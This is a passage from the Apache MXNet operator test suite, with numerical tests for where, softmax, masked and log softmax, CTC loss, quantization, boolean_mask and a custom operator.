x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx.astype('float32'))
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1._bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_environment('MXNET_SAFE_ACCUMULATION', '1')
def test_softmax_dtype():
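    # Per the MXNet environment-variable docs, MXNET_SAFE_ACCUMULATION=1 is expected to
    # make softmax-family operators accumulate in a wider type (e.g. float32 for float16
    # inputs), which is why low-precision inputs can be compared against higher-precision
    # references with the tight tolerances below.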
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
def np_softmax(x, axis=-1, temperature=1.0, normalize=True):
if normalize:
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x / temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
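# Reference softmax used by the tests in this file: subtracting the per-axis max first
# keeps exp() from overflowing without changing the result, and a larger temperature
# flattens the distribution, e.g. np_softmax(np.array([1., 2.])) is approximately
# [0.269, 0.731] while temperature=2.0 gives approximately [0.378, 0.622].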
def np_masked_softmax(data, mask, axis=-1, temperature=1.0, normalize=True):
neg = -1e18
if data.dtype == np.float16:
neg = -1e4
temp = np.where(mask, data, neg)
result = np_softmax(temp, axis=axis,
temperature=temperature,
normalize=normalize) * mask
return result
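# The mask is applied by replacing masked-out logits with a very negative number before
# the softmax, so those positions receive (numerically) zero probability; -1e4 is used
# for float16 because -1e18 is not representable in half precision (float16 max ~6.5e4).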
def np_masked_softmax_grad(out, grad_out, axis=-1, temperature=1.0):
temp = np.sum(out * grad_out, axis=axis, keepdims=True)
result = out * (grad_out - temp) / temperature
return result
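# This is the standard softmax Jacobian-vector product: for y = softmax(x / T),
# dL/dx = y * (dL/dy - sum(y * dL/dy, axis)) / T, which is what the expression above
# computes with `temp` holding the inner sum.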
def np_masked_log_softmax_grad(out, grad_out, mask, axis=-1, temperature=1.0):
grad_out = np.where(mask, grad_out, 0)
temp = np.sum(grad_out, axis=axis, keepdims=True)
result = (grad_out - np.exp(out) * temp) / temperature
result = np.where(mask, result, 0)
return result
@pytest.mark.parametrize('dtype', [np.float16, np.float32, np.float64])
@pytest.mark.parametrize('axis', [0, -1, -2, -3])
@pytest.mark.parametrize('ndims', [3, 4, 5])
@pytest.mark.parametrize('n_broadcast_axis', [0, 1, 2])
@pytest.mark.parametrize('temperature', [1, 5, 9, 11])
@pytest.mark.parametrize('normalize', [True])
@pytest.mark.flaky
def test_masked_softmax(dtype, axis, ndims, n_broadcast_axis, temperature, normalize):
n_broadcast_axis = min(n_broadcast_axis, ndims - 1)
shape = rand_shape_nd(ndims, dim=10)
mx_data = rand_ndarray(shape, dtype=dtype)
bcst_dims = []
while len(bcst_dims) < n_broadcast_axis:
ax = np.random.randint(0, ndims)
        if ax not in bcst_dims:
bcst_dims.append(ax)
shape_mask = list(shape)
for i in bcst_dims:
shape_mask[i] = 1
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape_mask)
    mx_mask = mx.nd.array(np_mask, dtype=bool)  # np.bool alias was removed from NumPy
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np_masked_softmax(np_data, np_mask, axis,
temperature, normalize)
np_grad_out = np_masked_softmax_grad(np_out, np_grad,
axis, temperature)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_softmax(data=data, mask=mask,
temperature=temperature, axis=axis,
normalize=normalize)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol,
dtype="asnumpy", equal_nan=True)
check_symbolic_backward(mx_sym, location, [mx_grad],
                            [np_grad_out, np.zeros(shape, dtype=bool)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
@pytest.mark.parametrize('dtype', ['float32'])
@pytest.mark.parametrize('ndims', [1, 2, 3, 4, 5])
def test_masked_log_softmax(dtype, ndims):
shape = np.random.randint(1, 5, size=ndims)
axis = np.random.randint(0, ndims)
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape)
    mx_mask = mx.nd.array(np_mask, dtype=bool)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np.log(np_masked_softmax(np_data, np_mask, axis)+1e-20) * np_mask
np_out_inf = np.where(np_mask, np_out, -np.inf)
np_grad_out = np_masked_log_softmax_grad(np_out, np_grad, np_mask, axis)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_log_softmax(data=data, mask=mask, axis=axis-ndims)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out_inf], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [mx_grad],
                            [np_grad_out, np.zeros(shape, dtype=bool)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc._bind(ctx=default_context(), args=[acts_nd, labels_nd])
    # test forward with grad calc (training mode)
    exe.forward(is_train=True)
    out_train_mode = exe.outputs[0].copy()
    # test forward without grad calc (inference mode)
    exe.forward(is_train=False)
    out_inference_mode = exe.outputs[0]
    # make sure losses calculated with both modes are the same
    assert_almost_equal(out_train_mode, out_inference_mode)
    # test against ground truth, if available
    if loss_truth is not None:
        assert_almost_equal(out_train_mode, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
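        # Reference values come from TensorFlow's CTC test data, where the blank is the
        # last class. When blank_label == 'first' the inputs and gradients are rolled so
        # that the blank becomes class 0, labels are shifted up by one, and 0 (instead of
        # -1) is used as the label padding value.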
vocab_size = 5
max_label_len = 5
        padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
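    # With grad_reqs='add' the gradient buffer accumulates across backward passes instead
    # of being overwritten, so after T passes over the two masks the expected gradient is
    # (bi + ci) broadcast over each row and multiplied by T, as computed below.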
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
# helper function to identify inputs likely to fail check_numeric_gradient tol test
# due to finite difference method inaccuracies or function discontinuities at the origin
def bad_input_finder(f, f_grad, dtype):
eps = default_numeric_eps()[np.dtype(dtype)]
rtol = default_rtols()[np.dtype(dtype)]
def expected_relative_error(x):
fd_gradient = (f(x+eps/2) - f(x-eps/2)) / eps
return abs(fd_gradient/f_grad(x) - 1)
def is_fd_problem_input(x):
return abs(x) < eps/2 or expected_relative_error(x) > rtol
return np.vectorize(is_fd_problem_input)
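# Illustrative sketch: for np.reciprocal an input near zero makes the central difference
# (f(x + eps/2) - f(x - eps/2)) / eps diverge from the analytic gradient -1/x**2, so
# bad_input_finder flags it and the tests below substitute 1.0 for such entries before
# running check_numeric_gradient.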
def test_reciprocal_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.reciprocal,
lambda x: -np.reciprocal(x)**2, np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
def test_cbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.cbrt,
lambda x: 1./(3 * np.cbrt(x)**2), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
def test_rcbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(lambda x: 1./np.cbrt(x),
lambda x: -1./(3 * np.cbrt(x)**4), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
